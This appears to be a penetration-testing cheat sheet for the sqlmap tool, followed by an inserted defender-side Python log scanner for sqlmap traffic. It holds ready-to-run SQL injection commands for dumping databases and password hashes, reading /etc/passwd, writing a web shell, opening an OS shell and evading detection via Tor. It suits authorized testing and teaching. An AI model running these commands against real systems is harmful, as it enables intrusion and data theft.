# SQLmap
## Overview
SQLmap is an open-source tool that automates the detection and exploitation of SQL injection vulnerabilities in web applications. It can fingerprint databases, extract data, access the underlying file system, and even execute OS commands — all through SQL injection flaws.
## Category
#gaining-access #web-exploitation #sql-injection
## Phase
Gaining Access
## Developer
- Authors: Bernardo Damele A.G. & Miroslav Stampar
- Website: sqlmap.org
- GitHub: github.com/sqlmapproject/sqlmap
## Install
```bash
# Kali Linux — pre-installed
sqlmap --version

# Manual install
git clone https://github.com/sqlmapproject/sqlmap.git
python3 sqlmap/sqlmap.py --version
```
## Supported Databases
MySQL, PostgreSQL, Microsoft SQL Server, Oracle, SQLite, IBM DB2, Firebird, SAP MaxDB, Sybase, and more.
## SQL Injection Techniques
| Code | Technique |
|---|---|
| B | Boolean-based blind |
| E | Error-based |
| U | UNION query-based |
| S | Stacked queries |
| T | Time-based blind |
| Q | Inline queries |
## Basic Usage
```bash
# Test a URL parameter for SQLi
sqlmap -u "http://target.com/page.php?id=1"

# Specify POST data
sqlmap -u "http://target.com/login.php" \
  --data="username=admin&password=test"

# Test with cookie (authenticated scan)
sqlmap -u "http://target.com/page.php?id=1" \
  --cookie="PHPSESSID=abc123"

# Use a saved HTTP request from Burp Suite
sqlmap -r request.txt

# Specify parameter to test
sqlmap -u "http://target.com/page.php?id=1&cat=2" -p id
```
## Enumeration Commands
```bash
# Get database banner/version
sqlmap -u "http://target.com/?id=1" --banner

# List databases
sqlmap -u "http://target.com/?id=1" --dbs

# List tables in a database
sqlmap -u "http://target.com/?id=1" -D dbname --tables

# List columns in a table
sqlmap -u "http://target.com/?id=1" -D dbname -T tablename --columns

# Dump a table
sqlmap -u "http://target.com/?id=1" -D dbname -T tablename --dump

# Dump everything (careful — can be huge)
sqlmap -u "http://target.com/?id=1" --dump-all

# Get current DB user
sqlmap -u "http://target.com/?id=1" --current-user

# Get current database
sqlmap -u "http://target.com/?id=1" --current-db

# Check if current user is DBA
sqlmap -u "http://target.com/?id=1" --is-dba
```
## Advanced / Post-Exploitation
```bash
# Read a file from the server (requires FILE privilege)
sqlmap -u "http://target.com/?id=1" --file-read="/etc/passwd"

# Write a web shell (requires DBMS file-write privilege on a web-served path)
sqlmap -u "http://target.com/?id=1" \
  --file-write="shell.php" \
  --file-dest="/var/www/html/shell.php"

# Interactive OS shell (if DB user has exec privileges)
sqlmap -u "http://target.com/?id=1" --os-shell

# Dump a table and enumerate DBMS user password hashes
# (sqlmap offers to dictionary-crack the hashes it finds)
sqlmap -u "http://target.com/?id=1" -D dbname -T users --dump \
  --passwords
```
## Key Flags
| Flag | Description |
|---|---|
| --level=N | Test intensity (1–5, default 1) |
| --risk=N | Risk level (1–3, default 1; higher may modify data) |
| --technique=BEUSTQ | Which SQLi techniques to use |
| --dbms=mysql | Force a specific DB type |
| --threads=N | Parallel requests (default 1) |
| --batch | Non-interactive; accept defaults |
| --random-agent | Randomize User-Agent header |
| --tor | Route through Tor |
| --proxy | Use HTTP proxy (e.g., Burp Suite) |
| --forms | Auto-detect and test HTML forms |
| --crawl=N | Crawl site N levels deep |
## Using with Burp Suite
1. Intercept the request in Burp → Save to file (e.g., `request.txt`)
2. Run `sqlmap -r request.txt --level=3 --risk=2`
## OPSEC Notes
SQLmap is noisy and will trigger WAFs and IDS. Use `--delay`, `--random-agent`, and `--tor` for stealth. Never run against a target without written authorization. Setting `--risk=3` can cause data modification — use carefully.
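As an added defender-side example (not part of the original note and not sqlmap's own code), the following Python scanner reads web-server access-log lines and flags the technique classes from the techniques table (B, E, U, S, T) together with sqlmap's default `sqlmap/` User-Agent, illustrating why sqlmap traffic is noisy. The combined log format, the regex heuristics and the sample log lines are assumptions constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Heuristics keyed by the sqlmap technique codes (B/E/U/S/T) from the table above.
# Patterns are illustrative (assumed), not sqlmap's exact payload catalogue.
TECHNIQUE_PATTERNS = {
    "B": re.compile(r"\b(and|or)\b\s+\d+\s*=\s*\d+", re.I),                    # boolean-based blind
    "E": re.compile(r"\b(extractvalue|updatexml|convert)\s*\(", re.I),          # error-based
    "U": re.compile(r"\bunion\b\s+(all\s+)?select\b", re.I),                    # UNION query-based
    "S": re.compile(r";\s*(select|insert|update|delete|drop)\b", re.I),         # stacked queries
    "T": re.compile(r"\b(sleep|benchmark|pg_sleep|waitfor\s+delay)\b", re.I),   # time-based blind
}
SQLMAP_UA = re.compile(r"^sqlmap/", re.I)   # sqlmap's default User-Agent begins with "sqlmap/"

# Assumed combined log format: ip - - [ts] "METHOD path HTTP/x" status bytes "referer" "user-agent"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
                    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')

def classify(line):
    """Return (ip, technique_codes, sqlmap_ua) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = unquote_plus(m.group("path"))          # payloads arrive URL-encoded
    codes = "".join(c for c, rx in TECHNIQUE_PATTERNS.items() if rx.search(decoded))
    return m.group("ip"), codes, bool(SQLMAP_UA.match(m.group("ua")))

def scan(lines):
    """Aggregate suspicious requests per source IP: {ip: {"codes": set, "sqlmap_ua": bool, "hits": n}}."""
    report = {}
    for line in lines:
        parsed = classify(line)
        if not parsed:
            continue
        ip, codes, ua_hit = parsed
        if not codes and not ua_hit:
            continue                                  # benign request, nothing to record
        entry = report.setdefault(ip, {"codes": set(), "sqlmap_ua": False, "hits": 0})
        entry["codes"].update(codes)
        entry["sqlmap_ua"] |= ua_hit
        entry["hits"] += 1
    return report

# Constructed sample log lines (not real traffic): 10.0.0.5 mimics a sqlmap run, 10.0.0.9 is benign.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /page.php?id=1%20AND%201=1 HTTP/1.1" 200 512 "-" "sqlmap/1.7 (https://sqlmap.org)"',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /page.php?id=1%20UNION%20ALL%20SELECT%20NULL,NULL HTTP/1.1" 200 640 "-" "sqlmap/1.7 (https://sqlmap.org)"',
    '10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /page.php?id=1%20AND%20SLEEP(5) HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /page.php?id=42 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]
```

The third request from 10.0.0.5 carries a browser User-Agent but is still caught on its payload, which is why detection should not rely on the User-Agent alone once `--random-agent` is in play.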
## Related Tools
- Metasploit — Can use SQLmap output; has its own SQLi modules
- Hydra — If SQLi reveals credentials, use Hydra for related services
- Nmap — Identify web servers before running SQLmap
- Nessus / OpenVAS — May flag SQL injection points for you to confirm with SQLmap
## Tags
#ethical-hacking #gaining-access #web-exploitation #sql-injection #database